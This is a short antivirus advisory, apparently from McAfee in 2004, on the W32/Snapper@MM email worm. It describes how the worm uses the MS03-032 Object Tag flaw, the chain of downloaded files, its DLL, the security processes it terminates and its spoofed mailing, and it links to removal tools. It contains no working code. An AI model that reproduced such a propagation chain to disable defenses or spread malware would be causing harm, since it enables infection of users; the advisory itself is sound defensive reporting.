03/29/04 - W32/Snapper@MM

This detection is for a worm intended to spread to email addresses extracted from the Windows Address Book of the victim machine.

Akin to the propagation mechanism of W32/Bagle.q@MM , this worm does not spread as an email attachment. Instead, an apparently blank email message is sent. However, the HTML formatted message contains code to exploit a Microsoft vulnerability found in security bulletin MS03-032 ("Object Tag vulnerability"). If successful, a remote file is downloaded, BANNER.HTM.
BANNER.HTM contains scripting to download another remote file (HTMLHELP.CGI) to the victim machine.
This file is actually a HTML application which contains a script that drops and loads a Win32 DLL (IELOAD.DLL) on the victim machine. The script will drop the DLL to %WinDir%.

Please Note : at the time of writing the HTMLHELP.CGI file is not available at the remote server, so this variant of the worm is unable to propagate.
When IELOAD.DLL is loaded on the victim machine, it installs as a Browser Helper Object (BHO) - uses a random CLSID number. It terminates the following processes if they are running:

NAVAPW32.EXE
CCAPP.EXE
OUTPOST.EXE
SPIDERML.EXE
The DLL contains its own SMTP engine to construct outgoing messages, which are sent to recipients extracted from the victim's Windows Address Book. The email messages contain HTML that load the BANNER.HTM file as described above. The email is constructed as follows:

From: (spoofed)
Subject: Re:
Message Body: (apparently blank)

More info on this worm:
http://vil.nai.com/vil/content/v_101138.htm

Removal Instructions

Go to the following website for removal instructions:

http://vil.nai.com/vil/content/v_101138.htm

Download Stinger to Scan for infection:
http://vil.nai.com/vil/stinger